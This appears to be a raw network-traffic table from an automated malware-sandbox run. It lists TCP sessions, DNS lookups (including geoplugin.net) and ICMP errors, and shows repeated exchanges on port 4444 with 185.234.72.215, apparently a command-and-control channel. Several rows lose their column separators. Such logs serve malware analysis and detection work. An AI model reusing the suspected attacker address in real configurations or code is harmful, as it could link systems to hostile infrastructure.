Jan 4, 2025 18:45:07.269658089 CET | 50584 | 443 | 192.168.2.4 | 142.250.186.164
Jan 4, 2025 18:45:07.269671917 CET | 443 | 50584 | 142.250.186.164 | 192.168.2.4
Jan 4, 2025 18:45:07.943335056 CET | 443 | 50584 | 142.250.186.164 | 192.168.2.4
Jan 4, 2025 18:45:07.943681002 CET | 50584 | 443 | 192.168.2.4 | 142.250.186.164
                                                                                                                                                                                            Jan 4, 2025 18:45:07.943707943 CET44350584142.250.186.164192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:07.944560051 CET44350584142.250.186.164192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:07.944677114 CET50584443192.168.2.4142.250.186.164
                                                                                                                                                                                            Jan 4, 2025 18:45:07.945009947 CET50584443192.168.2.4142.250.186.164
                                                                                                                                                                                            Jan 4, 2025 18:45:07.945063114 CET44350584142.250.186.164192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:08.088450909 CET50584443192.168.2.4142.250.186.164
                                                                                                                                                                                            Jan 4, 2025 18:45:08.088489056 CET44350584142.250.186.164192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:08.187278986 CET50584443192.168.2.4142.250.186.164
                                                                                                                                                                                            Jan 4, 2025 18:45:11.997351885 CET50584443192.168.2.4142.250.186.164
                                                                                                                                                                                            Jan 4, 2025 18:45:11.997454882 CET44350584142.250.186.164192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:11.997631073 CET50584443192.168.2.4142.250.186.164
                                                                                                                                                                                            Jan 4, 2025 18:45:13.824255943 CET50605443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:13.824264050 CET4435060513.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:13.824311972 CET50605443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:13.824590921 CET50605443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:13.824598074 CET4435060513.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:14.495781898 CET4435060513.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:14.496901989 CET50605443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:14.496908903 CET4435060513.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:14.497752905 CET4435060513.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:14.497806072 CET50605443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:14.500889063 CET50605443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:14.500938892 CET4435060513.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:14.686917067 CET50605443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:14.686923981 CET4435060513.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:14.887761116 CET50605443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:15.477538109 CET444449734185.234.72.215192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:15.608808994 CET497344444192.168.2.4185.234.72.215
                                                                                                                                                                                            Jan 4, 2025 18:45:15.790498972 CET497344444192.168.2.4185.234.72.215
                                                                                                                                                                                            Jan 4, 2025 18:45:15.795332909 CET444449734185.234.72.215192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:19.221127987 CET4435060513.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:19.221195936 CET4435060513.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:19.226555109 CET50605443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:20.266149044 CET50605443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:20.266175032 CET4435060513.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:21.721231937 CET50623443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:21.721239090 CET4435062313.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:21.721295118 CET50623443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:21.722064972 CET50623443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:21.722084045 CET4435062313.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:22.377846003 CET4435062313.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:22.378000975 CET50623443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:22.378007889 CET4435062313.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:22.378329992 CET4435062313.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:22.378593922 CET50623443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:22.378652096 CET4435062313.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:22.483231068 CET50623443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:27.096148014 CET4435062313.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:27.096249104 CET4435062313.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:27.096309900 CET50623443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:27.325910091 CET50623443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:27.325948954 CET4435062313.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:32.968455076 CET50658443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:32.968461990 CET4435065813.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:32.969526052 CET50658443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:32.969685078 CET50658443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:32.969693899 CET4435065813.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:33.606472015 CET4435065813.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:33.606775045 CET50658443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:33.606787920 CET4435065813.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:33.607630014 CET4435065813.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:33.607692003 CET50658443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:33.608021975 CET50658443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:33.608071089 CET4435065813.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:33.674021959 CET50658443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:33.674027920 CET4435065813.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:33.812618017 CET50658443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:37.626322985 CET50658443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:37.626391888 CET4435065813.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:37.626537085 CET4435065813.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:37.626560926 CET50658443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:37.626589060 CET50658443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:45.495064974 CET444449734185.234.72.215192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:45.709475040 CET497344444192.168.2.4185.234.72.215
                                                                                                                                                                                            Jan 4, 2025 18:45:46.121970892 CET497344444192.168.2.4185.234.72.215
                                                                                                                                                                                            Jan 4, 2025 18:45:46.126867056 CET444449734185.234.72.215192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:46.798181057 CET50740443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:46.798217058 CET4435074013.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:46.798278093 CET50740443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:46.800584078 CET50740443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:46.800609112 CET4435074013.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:47.465920925 CET4435074013.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:47.466177940 CET50740443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:47.466193914 CET4435074013.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:47.467061043 CET4435074013.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:47.467156887 CET50740443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:47.467566013 CET50740443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:47.467619896 CET4435074013.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:47.578296900 CET50740443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:47.578306913 CET4435074013.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:47.685574055 CET50740443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:52.057116032 CET50740443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:52.057183027 CET4435074013.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:52.057225943 CET50740443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:52.779392004 CET50774443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:52.779398918 CET4435077413.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:52.779550076 CET50774443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:52.779854059 CET50774443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:52.779861927 CET4435077413.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:53.447499037 CET4435077413.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:53.447738886 CET50774443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:53.447746038 CET4435077413.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:53.448590994 CET4435077413.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:53.448714972 CET50774443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:53.448940039 CET50774443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:53.448990107 CET4435077413.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:53.514841080 CET50774443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:53.514847040 CET4435077413.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:53.717530012 CET50774443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:57.491739035 CET50774443192.168.2.413.107.246.60
Jan 4, 2025 18:45:57.491836071 CET | 443 | 50774 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:45:57.491899014 CET | 50774 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:45:59.909547091 CET | 50781 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:45:59.909554958 CET | 443 | 50781 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:45:59.909640074 CET | 50781 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:45:59.909862041 CET | 50781 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:45:59.909872055 CET | 443 | 50781 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:00.570159912 CET | 443 | 50781 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:00.570425034 CET | 50781 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:00.570435047 CET | 443 | 50781 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:00.571415901 CET | 443 | 50781 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:00.571465969 CET | 50781 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:00.571768999 CET | 50781 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:00.571822882 CET | 443 | 50781 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:00.717197895 CET | 50781 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:00.717228889 CET | 443 | 50781 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:00.906305075 CET | 50781 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:02.452847958 CET | 50781 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:02.452959061 CET | 443 | 50781 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:02.453022957 CET | 50781 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:06.044451952 CET | 50796 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:06.044471025 CET | 443 | 50796 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:06.044528961 CET | 50796 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:06.044687033 CET | 50796 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:06.044698000 CET | 443 | 50796 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:06.679447889 CET | 443 | 50796 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:06.679636002 CET | 50796 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:06.679646969 CET | 443 | 50796 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:06.680697918 CET | 443 | 50796 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:06.680752039 CET | 50796 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:06.681021929 CET | 50796 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:06.681087971 CET | 443 | 50796 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:06.863307953 CET | 50796 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:06.863321066 CET | 443 | 50796 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:07.000607014 CET | 50796 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:07.336388111 CET | 50798 | 443 | 192.168.2.4 | 142.250.185.164
Jan 4, 2025 18:46:07.336420059 CET | 443 | 50798 | 142.250.185.164 | 192.168.2.4
Jan 4, 2025 18:46:07.336472988 CET | 50798 | 443 | 192.168.2.4 | 142.250.185.164
Jan 4, 2025 18:46:07.336658001 CET | 50798 | 443 | 192.168.2.4 | 142.250.185.164
Jan 4, 2025 18:46:07.336672068 CET | 443 | 50798 | 142.250.185.164 | 192.168.2.4
Jan 4, 2025 18:46:07.973681927 CET | 443 | 50798 | 142.250.185.164 | 192.168.2.4
Jan 4, 2025 18:46:07.974033117 CET | 50798 | 443 | 192.168.2.4 | 142.250.185.164
Jan 4, 2025 18:46:07.974050045 CET | 443 | 50798 | 142.250.185.164 | 192.168.2.4
Jan 4, 2025 18:46:07.974910021 CET | 443 | 50798 | 142.250.185.164 | 192.168.2.4
Jan 4, 2025 18:46:07.974982023 CET | 50798 | 443 | 192.168.2.4 | 142.250.185.164
Jan 4, 2025 18:46:07.975323915 CET | 50798 | 443 | 192.168.2.4 | 142.250.185.164
Jan 4, 2025 18:46:07.975374937 CET | 443 | 50798 | 142.250.185.164 | 192.168.2.4
Jan 4, 2025 18:46:08.107585907 CET | 50798 | 443 | 192.168.2.4 | 142.250.185.164
Jan 4, 2025 18:46:08.107597113 CET | 443 | 50798 | 142.250.185.164 | 192.168.2.4
Jan 4, 2025 18:46:08.215804100 CET | 50798 | 443 | 192.168.2.4 | 142.250.185.164
Jan 4, 2025 18:46:11.412275076 CET | 443 | 50796 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:11.412368059 CET | 443 | 50796 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:11.412450075 CET | 50796 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:11.743591070 CET | 50796 | 443 | 192.168.2.4 | 13.107.246.60
Jan 4, 2025 18:46:11.743603945 CET | 443 | 50796 | 13.107.246.60 | 192.168.2.4
Jan 4, 2025 18:46:12.462798119 CET | 50798 | 443 | 192.168.2.4 | 142.250.185.164
Jan 4, 2025 18:46:12.462857962 CET | 443 | 50798 | 142.250.185.164 | 192.168.2.4
Jan 4, 2025 18:46:12.462914944 CET | 50798 | 443 | 192.168.2.4 | 142.250.185.164
Jan 4, 2025 18:46:15.509845018 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:46:15.620866060 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 4, 2025 18:41:58.528238058 CET | 50619 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:41:58.537939072 CET | 53 | 50619 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:42:03.090076923 CET | 53 | 65357 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:42:03.092542887 CET | 53 | 63105 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:42:04.087935925 CET | 53 | 60772 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:42:06.289007902 CET | 61581 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:42:06.289140940 CET | 56026 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:42:07.111042976 CET | 58463 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:42:07.111406088 CET | 53173 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:42:07.117693901 CET | 53 | 58463 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:42:07.118217945 CET | 53 | 53173 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:42:07.446263075 CET | 50608 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:42:07.446523905 CET | 59182 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:42:10.705421925 CET | 53 | 50999 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:42:11.784626961 CET | 61524 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:42:11.784626961 CET | 60022 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:42:15.878036022 CET | 138 | 138 | 192.168.2.4 | 192.168.2.255
Jan 4, 2025 18:42:21.335083961 CET | 53 | 63655 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:42:40.099209070 CET | 53 | 63643 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:43:02.682549953 CET | 53 | 63991 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:43:02.738709927 CET | 53 | 65326 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:43:08.842801094 CET | 56937 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:43:08.842966080 CET | 62423 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:43:11.789041996 CET | 52950 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:43:11.789257050 CET | 49650 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:43:33.339607000 CET | 53 | 56448 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:44:07.218395948 CET | 57732 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:44:07.220752001 CET | 55909 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:44:07.225565910 CET | 53 | 57732 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:44:07.227592945 CET | 53 | 55909 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:44:10.416934967 CET | 62486 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:44:10.417674065 CET | 54759 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:44:18.134434938 CET | 53 | 62687 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:45:11.823878050 CET | 49186 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:45:11.823878050 CET | 60874 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:45:13.814213991 CET | 62006 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:45:13.814326048 CET | 50486 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:45:33.526132107 CET | 53 | 56637 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:45:38.270622015 CET | 53 | 57906 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:46:07.328948975 CET | 59783 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:46:07.329149008 CET | 49606 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:46:07.335469961 CET | 53 | 59783 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:46:07.335668087 CET | 53 | 49606 | 1.1.1.1 | 192.168.2.4
Jan 4, 2025 18:46:11.822084904 CET | 60836 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:46:11.840440989 CET | 64916 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 18:46:16.536588907 CET | 138 | 138 | 192.168.2.4 | 192.168.2.255
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jan 4, 2025 18:42:03.999545097 CET | 192.168.2.4 | 1.1.1.1 | c2e3 | (Port unreachable) | Destination Unreachable
Jan 4, 2025 18:42:06.323827982 CET | 192.168.2.4 | 1.1.1.1 | c2c1 | (Port unreachable) | Destination Unreachable
Jan 4, 2025 18:42:07.852355003 CET | 192.168.2.4 | 1.1.1.1 | c2e3 | (Port unreachable) | Destination Unreachable
Jan 4, 2025 18:42:12.980087042 CET | 192.168.2.4 | 1.1.1.1 | c264 | (Port unreachable) | Destination Unreachable
Jan 4, 2025 18:42:17.284177065 CET | 192.168.2.4 | 1.1.1.1 | c264 | (Port unreachable) | Destination Unreachable
Jan 4, 2025 18:43:04.589380980 CET | 192.168.2.4 | 1.1.1.1 | c2e3 | (Port unreachable) | Destination Unreachable
Jan 4, 2025 18:43:15.514178991 CET | 192.168.2.4 | 1.1.1.1 | c2e3 | (Port unreachable) | Destination Unreachable
Jan 4, 2025 18:43:20.538971901 CET | 192.168.2.4 | 1.1.1.1 | c264 | (Port unreachable) | Destination Unreachable
Jan 4, 2025 18:45:08.188726902 CET | 192.168.2.4 | 1.1.1.1 | c2e3 | (Port unreachable) | Destination Unreachable
Jan 4, 2025 18:46:09.575728893 CET | 192.168.2.4 | 1.1.1.1 | c2e3 | (Port unreachable) | Destination Unreachable
Jan 4, 2025 18:46:11.848278999 CET | 192.168.2.4 | 1.1.1.1 | c275 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 4, 2025 18:41:58.528238058 CET | 192.168.2.4 | 1.1.1.1 | 0xd124 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:42:06.289007902 CET | 192.168.2.4 | 1.1.1.1 | 0xda | Standard query (0) | js.monitor.azure.com | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:42:06.289140940 CET | 192.168.2.4 | 1.1.1.1 | 0x3866 | Standard query (0) | js.monitor.azure.com | 65 | IN (0x0001) | false
Jan 4, 2025 18:42:07.111042976 CET | 192.168.2.4 | 1.1.1.1 | 0xcfcf | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:42:07.111406088 CET | 192.168.2.4 | 1.1.1.1 | 0x2d09 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Jan 4, 2025 18:42:07.446263075 CET | 192.168.2.4 | 1.1.1.1 | 0x4e83 | Standard query (0) | js.monitor.azure.com | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:42:07.446523905 CET | 192.168.2.4 | 1.1.1.1 | 0xf792 | Standard query (0) | js.monitor.azure.com | 65 | IN (0x0001) | false
Jan 4, 2025 18:42:11.784626961 CET | 192.168.2.4 | 1.1.1.1 | 0x8814 | Standard query (0) | mdec.nelreports.net | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:42:11.784626961 CET | 192.168.2.4 | 1.1.1.1 | 0x5880 | Standard query (0) | mdec.nelreports.net | 65 | IN (0x0001) | false
Jan 4, 2025 18:43:08.842801094 CET | 192.168.2.4 | 1.1.1.1 | 0x348e | Standard query (0) | js.monitor.azure.com | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:43:08.842966080 CET | 192.168.2.4 | 1.1.1.1 | 0x163c | Standard query (0) | js.monitor.azure.com | 65 | IN (0x0001) | false
Jan 4, 2025 18:43:11.789041996 CET | 192.168.2.4 | 1.1.1.1 | 0xa35c | Standard query (0) | mdec.nelreports.net | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:43:11.789257050 CET | 192.168.2.4 | 1.1.1.1 | 0xf6d | Standard query (0) | mdec.nelreports.net | 65 | IN (0x0001) | false
Jan 4, 2025 18:44:07.218395948 CET | 192.168.2.4 | 1.1.1.1 | 0x681 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:44:07.220752001 CET | 192.168.2.4 | 1.1.1.1 | 0x2c6e | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Jan 4, 2025 18:44:10.416934967 CET | 192.168.2.4 | 1.1.1.1 | 0x8cff | Standard query (0) | js.monitor.azure.com | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:44:10.417674065 CET | 192.168.2.4 | 1.1.1.1 | 0xdd3f | Standard query (0) | js.monitor.azure.com | 65 | IN (0x0001) | false
Jan 4, 2025 18:45:11.823878050 CET | 192.168.2.4 | 1.1.1.1 | 0xc52f | Standard query (0) | mdec.nelreports.net | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:45:11.823878050 CET | 192.168.2.4 | 1.1.1.1 | 0xebf8 | Standard query (0) | mdec.nelreports.net | 65 | IN (0x0001) | false
                                                                                                                                                                                            Jan 4, 2025 18:45:13.814213991 CET192.168.2.41.1.1.10x344dStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:13.814326048 CET192.168.2.41.1.1.10x2b14Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:46:07.328948975 CET192.168.2.41.1.1.10xdc5fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:46:07.329149008 CET192.168.2.41.1.1.10x939eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:46:11.822084904 CET192.168.2.41.1.1.10xca58Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:46:11.840440989 CET192.168.2.41.1.1.10x60faStandard query (0)mdec.nelreports.net65IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 4, 2025 18:41:58.537939072 CET | 1.1.1.1 | 192.168.2.4 | 0xd124 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:42:06.295747042 CET | 1.1.1.1 | 192.168.2.4 | 0x6a87 | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:06.295747042 CET | 1.1.1.1 | 192.168.2.4 | 0x6a87 | No error (0) | shed.dual-low.s-part-0039.t-0009.t-msedge.net | s-part-0039.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:06.295747042 CET | 1.1.1.1 | 192.168.2.4 | 0x6a87 | No error (0) | s-part-0039.t-0009.t-msedge.net | | 13.107.246.67 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:42:06.295870066 CET | 1.1.1.1 | 192.168.2.4 | 0x4954 | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:06.296917915 CET | 1.1.1.1 | 192.168.2.4 | 0xda | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | | CNAME (Canonical name) | IN (0x0001) | false
